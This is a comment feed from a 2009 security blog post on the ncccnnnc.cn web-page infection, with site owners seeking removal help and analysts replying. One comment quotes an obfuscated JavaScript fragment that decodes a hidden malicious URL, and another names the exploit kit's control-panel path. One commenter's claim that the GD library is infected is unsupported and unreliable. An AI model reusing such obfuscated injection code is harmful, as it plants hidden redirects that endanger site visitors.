<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
		>
<channel>
	<title>Comments on: Ncccnnnc .cn &#8211; Warning: Not Opera Only</title>
	<atom:link href="http://blog.unmaskparasites.com/2009/10/15/ncccnnnc-cn-warning-not-opera-only/feed/" rel="self" type="application/rss+xml" />
	<link>http://blog.unmaskparasites.com/2009/10/15/ncccnnnc-cn-warning-not-opera-only/</link>
	<description>Website insecurity by example</description>
	<lastBuildDate>Wed, 08 Sep 2010 19:34:58 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9.1</generator>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
		<item>
		<title>By: Larry</title>
		<link>http://blog.unmaskparasites.com/2009/10/15/ncccnnnc-cn-warning-not-opera-only/comment-page-1/#comment-5600</link>
		<dc:creator>Larry</dc:creator>
		<pubDate>Fri, 13 Nov 2009 09:47:36 +0000</pubDate>
		<guid isPermaLink="false">http://blog.unmaskparasites.com/?p=341#comment-5600</guid>
		<description>Thank you for your reply Denis.

I made a test yesterday, uploaded a blank file, say test.html. When I opened it via browser all I can see is the code above (it supposed to be blank). This is just too weird for me. Can you please let me know how to solve this issue exactly? I have already contacted my hosting provider including a link to this blog two days ago but but the code is still there. Thanks a lot in advance!</description>
		<content:encoded><![CDATA[<p>Thank you for your reply Denis.</p>
<p>I made a test yesterday, uploaded a blank file, say test.html. When I opened it via browser all I can see is the code above (it supposed to be blank). This is just too weird for me. Can you please let me know how to solve this issue exactly? I have already contacted my hosting provider including a link to this blog two days ago but but the code is still there. Thanks a lot in advance!</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Denis</title>
		<link>http://blog.unmaskparasites.com/2009/10/15/ncccnnnc-cn-warning-not-opera-only/comment-page-1/#comment-5584</link>
		<dc:creator>Denis</dc:creator>
		<pubDate>Thu, 12 Nov 2009 19:47:19 +0000</pubDate>
		<guid isPermaLink="false">http://blog.unmaskparasites.com/?p=341#comment-5584</guid>
		<description>Hi,

This must be only a part of the code, since the only thing it does is creates a new &quot;hidden&quot; style and prints &quot;&lt;em&gt;http ://ncccnnnc .cn/img/ index.php&lt;/em&gt;&quot;

Anyway, this must be the same server-wide exploits and you should contact your hosting provider.</description>
		<content:encoded><![CDATA[<p>Hi,</p>
<p>This must be only a part of the code, since the only thing it does is creates a new &#8220;hidden&#8221; style and prints &#8220;<em>http ://ncccnnnc .cn/img/ index.php</em>&#8221;</p>
<p>Anyway, this must be the same server-wide exploits and you should contact your hosting provider.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Larry</title>
		<link>http://blog.unmaskparasites.com/2009/10/15/ncccnnnc-cn-warning-not-opera-only/comment-page-1/#comment-5577</link>
		<dc:creator>Larry</dc:creator>
		<pubDate>Thu, 12 Nov 2009 14:52:25 +0000</pubDate>
		<guid isPermaLink="false">http://blog.unmaskparasites.com/?p=341#comment-5577</guid>
		<description>My sites infected with similar code. It&#039;s not in any of the files but it&#039;s there when I open via browser. Can someone please suggest me how to solve this? The code is :

var MouCn = document;MouCn.writeln(eRRhK());function NZNrq(HYDjw){ var hOWsD = &quot;&quot;, kTPQQ = 0;for (kTPQQ=HYDjw.length-1;kTPQQ&gt;=0;kTPQQ--){hOWsD += HYDjw.charAt(kTPQQ);} return hOWsD;}function eRRhK(){document.write(&quot;.mOnjv{width:0%;height:0%;border:none;}&quot;);var uyofy = &quot;&quot;;var yxZmn = uyofy.replace(/[\+$]/g, hDtWy(&quot;.70.68.70.2e.78.65.64.6e.69.2f.67.6d.69.2f.6e.63.2e.63.6e.6e.6e.63.63.63.6e.2f.2f.3a.70.74.74.68&quot;));return yxZmn;}function hDtWy(GszBw){GszBw = GszBw.replace(/[\.]/g, &quot;%&quot;);GszBw = unescape(GszBw);return NZNrq(GszBw);}</description>
		<content:encoded><![CDATA[<p>My sites infected with similar code. It&#8217;s not in any of the files but it&#8217;s there when I open via browser. Can someone please suggest me how to solve this? The code is :</p>
<p>var MouCn = document;MouCn.writeln(eRRhK());function NZNrq(HYDjw){ var hOWsD = &#8220;&#8221;, kTPQQ = 0;for (kTPQQ=HYDjw.length-1;kTPQQ&gt;=0;kTPQQ&#8211;){hOWsD += HYDjw.charAt(kTPQQ);} return hOWsD;}function eRRhK(){document.write(&#8220;.mOnjv{width:0%;height:0%;border:none;}&#8221;);var uyofy = &#8220;&#8221;;var yxZmn = uyofy.replace(/[\+$]/g, hDtWy(&#8220;.70.68.70.2e.78.65.64.6e.69.2f.67.6d.69.2f.6e.63.2e.63.6e.6e.6e.63.63.63.6e.2f.2f.3a.70.74.74.68&#8243;));return yxZmn;}function hDtWy(GszBw){GszBw = GszBw.replace(/[\.]/g, &#8220;%&#8221;);GszBw = unescape(GszBw);return NZNrq(GszBw);}</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Cyclone</title>
		<link>http://blog.unmaskparasites.com/2009/10/15/ncccnnnc-cn-warning-not-opera-only/comment-page-1/#comment-5324</link>
		<dc:creator>Cyclone</dc:creator>
		<pubDate>Mon, 02 Nov 2009 17:07:03 +0000</pubDate>
		<guid isPermaLink="false">http://blog.unmaskparasites.com/?p=341#comment-5324</guid>
		<description>I have figured it out! The virus infects your image files with a corrupted HTML file, which is parsed out in the page. Now, the infection is in the GD library, you need to completely reinstall!</description>
		<content:encoded><![CDATA[<p>I have figured it out! The virus infects your image files with a corrupted HTML file, which is parsed out in the page. Now, the infection is in the GD library, you need to completely reinstall!</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Cyclone</title>
		<link>http://blog.unmaskparasites.com/2009/10/15/ncccnnnc-cn-warning-not-opera-only/comment-page-1/#comment-4967</link>
		<dc:creator>Cyclone</dc:creator>
		<pubDate>Mon, 26 Oct 2009 23:32:01 +0000</pubDate>
		<guid isPermaLink="false">http://blog.unmaskparasites.com/?p=341#comment-4967</guid>
		<description>I have got this virus on my website, please send me an email about removal if possible. Thanks for the help!!!</description>
		<content:encoded><![CDATA[<p>I have got this virus on my website, please send me an email about removal if possible. Thanks for the help!!!</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Denis</title>
		<link>http://blog.unmaskparasites.com/2009/10/15/ncccnnnc-cn-warning-not-opera-only/comment-page-1/#comment-4802</link>
		<dc:creator>Denis</dc:creator>
		<pubDate>Sat, 17 Oct 2009 11:13:55 +0000</pubDate>
		<guid isPermaLink="false">http://blog.unmaskparasites.com/?p=341#comment-4802</guid>
		<description>The 3 infected servers (that I know of) seem to have been recovered at the moment, so I can&#039;t check it. But I think, the malicious code was only injected into html files (files with HTML markup). I guess visitors to Server B were not affected</description>
		<content:encoded><![CDATA[<p>The 3 infected servers (that I know of) seem to have been recovered at the moment, so I can&#8217;t check it. But I think, the malicious code was only injected into html files (files with HTML markup). I guess visitors to Server B were not affected</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Denis</title>
		<link>http://blog.unmaskparasites.com/2009/10/15/ncccnnnc-cn-warning-not-opera-only/comment-page-1/#comment-4801</link>
		<dc:creator>Denis</dc:creator>
		<pubDate>Sat, 17 Oct 2009 11:11:16 +0000</pubDate>
		<guid isPermaLink="false">http://blog.unmaskparasites.com/?p=341#comment-4801</guid>
		<description>Thanks for the info.

So it looks like ncccnnnc is not the only domain they use?

Do you have any information about how this exloit works?</description>
		<content:encoded><![CDATA[<p>Thanks for the info.</p>
<p>So it looks like ncccnnnc is not the only domain they use?</p>
<p>Do you have any information about how this exloit works?</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: MalwareDomainList</title>
		<link>http://blog.unmaskparasites.com/2009/10/15/ncccnnnc-cn-warning-not-opera-only/comment-page-1/#comment-4785</link>
		<dc:creator>MalwareDomainList</dc:creator>
		<pubDate>Fri, 16 Oct 2009 13:09:23 +0000</pubDate>
		<guid isPermaLink="false">http://blog.unmaskparasites.com/?p=341#comment-4785</guid>
		<description>This is a YES exploit kit. Control panel can be found at ncccnnnc. cn/img/admin/index.php

It exists for about one week. All YES exploit kits query malwaredomainlist if its sites have already been listed on MDL.</description>
		<content:encoded><![CDATA[<p>This is a YES exploit kit. Control panel can be found at ncccnnnc. cn/img/admin/index.php</p>
<p>It exists for about one week. All YES exploit kits query malwaredomainlist if its sites have already been listed on MDL.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Tweets that mention Ncccnnnc .cn – Warning: Not Opera Only &#124; Unmask Parasites. Blog. -- Topsy.com</title>
		<link>http://blog.unmaskparasites.com/2009/10/15/ncccnnnc-cn-warning-not-opera-only/comment-page-1/#comment-4780</link>
		<dc:creator>Tweets that mention Ncccnnnc .cn – Warning: Not Opera Only &#124; Unmask Parasites. Blog. -- Topsy.com</dc:creator>
		<pubDate>Fri, 16 Oct 2009 04:59:02 +0000</pubDate>
		<guid isPermaLink="false">http://blog.unmaskparasites.com/?p=341#comment-4780</guid>
		<description>[...] This post was mentioned on Twitter by Denis, sarfraznawaz. sarfraznawaz said: Ncccnnnc .cn – #Warning: Not #Opera Only http://bit.ly/13pxLg [...]</description>
		<content:encoded><![CDATA[<p>[...] This post was mentioned on Twitter by Denis, sarfraznawaz. sarfraznawaz said: Ncccnnnc .cn – #Warning: Not #Opera Only <a href="http://bit.ly/13pxLg" rel="nofollow">http://bit.ly/13pxLg</a> [...]</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Ed</title>
		<link>http://blog.unmaskparasites.com/2009/10/15/ncccnnnc-cn-warning-not-opera-only/comment-page-1/#comment-4777</link>
		<dc:creator>Ed</dc:creator>
		<pubDate>Fri, 16 Oct 2009 02:11:35 +0000</pubDate>
		<guid isPermaLink="false">http://blog.unmaskparasites.com/?p=341#comment-4777</guid>
		<description>It seems that the freebie hosting service I was using and it appears everyone&#039;s site on at least one server is infected. My question is...

I had a .jpeg signature picture hosted at my infected server that was linked to for use as a signature file on other .php forums. Should visitors to that other forum that viewed that signature worry? 

ex:server A (infected server)  xxxx.jpeg hosted on that server.
 
Server B (not infected) -  URL link in signature file to the xxxx.jpeg on Server A

Are those that viewed the posts with the sig files, in danger?</description>
		<content:encoded><![CDATA[<p>It seems that the freebie hosting service I was using and it appears everyone&#8217;s site on at least one server is infected. My question is&#8230;</p>
<p>I had a .jpeg signature picture hosted at my infected server that was linked to for use as a signature file on other .php forums. Should visitors to that other forum that viewed that signature worry? </p>
<p>ex:server A (infected server)  xxxx.jpeg hosted on that server.</p>
<p>Server B (not infected) &#8211;  URL link in signature file to the xxxx.jpeg on Server A</p>
<p>Are those that viewed the posts with the sig files, in danger?</p>
]]></content:encoded>
	</item>
</channel>
</rss>
